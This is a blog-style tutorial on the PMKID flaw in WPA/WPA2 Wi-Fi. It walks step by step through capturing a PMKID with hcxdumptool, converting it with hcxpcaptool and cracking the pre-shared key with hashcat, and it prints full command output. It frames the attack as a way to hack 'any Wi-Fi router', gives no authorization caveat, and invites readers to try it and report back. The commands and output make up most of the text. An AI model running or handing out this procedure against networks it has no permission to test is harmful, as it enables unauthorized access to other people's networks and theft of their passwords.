When it comes to the security of Wi-Fi networks, it’s well known in the circles of network security professionals that some major vulnerabilities that made them vulnerable to hack attacks have always existed. The KRACK attack was unarguably the most infamous Wi-Fi hacking mechanism utilizing one such vulnerability of Wi-Fi protocol. However, as time passed many of those vulnerabilities were fixed by the Wi-Fi alliance and hardware manufacturers, and therefore the hacking methods relying on them stopped working. Now it turns out that one more vulnerability has been discovered in Wi-Fi protocol that can allow hacking of both WPA and WPA2 protected networks. Let’s have a look at it.
The new WPA/WPA2 flaw
The flaw that makes this hacking possible is a new one. It has been discovered by the lead developer of Hashcat password recovery tool Jens ‘atom’ Steube. He discovered it accidentally while checking the upcoming WPA3 Wi-Fi protocol for possible loopholes. The flaw doesn’t require a complete 4-way handshake of EAPOL network. Instead, it relies on Robust Security Network Information Element (RSN IE) of a single EAPOL frame. From there it extracts a pre-shared key (PSK) login password and allows you to log on to the network with that password.
The difference between old and new method
According to Steube there’s a major difference between old hacking methods and this new method. While old methods required the user of Wi-Fi network to be logged on to the network, this new method eliminates that requirement. It can work even if no one is logged on to the network. As long as network is available, it will work.
Things you need
Before we get started you’ll have to download the following tools from their own respective links:
- HCXDumpTool (version 4.2 or higher): This is a tool that can capture packets from WLAN devices. Download the entire folder as a ZIP file.
- HCXPCapTool: This tool converts the PMKID captured from HCXDumpTool into a hash.
- Hashcat password recovery tool: This tool tries to acquire the password in plain text from the hashed PMKID.
Once you’ve downloaded all 3 of them you’re good to go. Let’s get started:
The steps for hacking a Wi-Fi password using new method
Given below are the steps to hack the password of any Wi-Fi router using the latest WPA/WPA2 flaw:
METHOD 1: First of all let’s use the HCXXDumpTool to obtain the PMKID of target network. The PMKID will then be used to steal the password of that network. Just execute the following command:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
This will lead to an output like this:
start capturing (stop with ctrl+c) INTERFACE:...............: wlp39s0f3u4u5 FILTERLIST...............: 0 entries MAC CLIENT...............: 89acf0e761f4 (client) MAC ACCESS POINT.........: 4604ba734d4e (start NIC) EAPOL TIMEOUT............: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER............: 62083 ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
If target network accepts your association request, you’ll receive a message saying “FOUND PMKID” like shown below:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206] [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
Depending on the nature of the network this may take some time. Steube recommends allowing the command to run for at least 10 minutes before aborting.
METHOD 2: Now dump the received frame into a file (in ‘pcapng’ format).
METHOD 3: Now with help of hcxpcaptool convert the received frame into a hash format. Execute the following command:
$ ./hcxpcaptool -z test.16800 test.pcapng
You’ll get an output like this:
start reading from test.pcapng summary: -------- file name....................: test.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.17.11-arch1 file application information.: hcxdumptool 4.2.0 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 66 skipped packets..............: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 17 probe requests...............: 1 probe responses..............: 11 association requests.........: 5 association responses........: 5 authentications (OPEN SYSTEM): 13 authentications (BROADCOM)...: 1 EAPOL packets................: 14 EAPOL PMKIDs.................: 1 1 PMKID(s) written to test.16800
Now you’ll see the hashed output in written file. The content of that file will look like this:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
METHOD 4: Now run Hashcat to derive the pre-shared key from this hashed PMKID. Execute the following command :
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
The output will look like this:
hashcat (v4.2.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt * Brute-Force * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Temperature abort trigger set to 90c 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat! Session..........: hashcat Status...........: Cracked Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs) Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs) Guess.Mask.......: ?l?l?l?l?l?lt! [8] Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#2.....: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#3.....: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#4.....: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1 Speed.Dev.#*.....: 1641.3 kH/s Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 66846720/308915776 (21.64%) Rejected.........: 0/66846720 (0.00%) Restore.Point....: 0/11881376 (0.00%) Candidates.#1....: hariert! -> hhzkzet! Candidates.#2....: hdtivst! -> hzxkbnt! Candidates.#3....: gnxpwet! -> gwqivst! Candidates.#4....: gxhcddt! -> grjmrut! HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1 HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1 HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1 HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1 Started: Thu Jul 26 12:51:30 2018 Stopped: Thu Jul 26 12:52:21 2018
And that’s it. You’ve successfully hacked the target network, and now you can start browsing on it. The hack is expected to work against all 802.11 i/p/q/r networks, though this claim has not been verified yet. You give it a try and let us know in the comments whether it works or not.
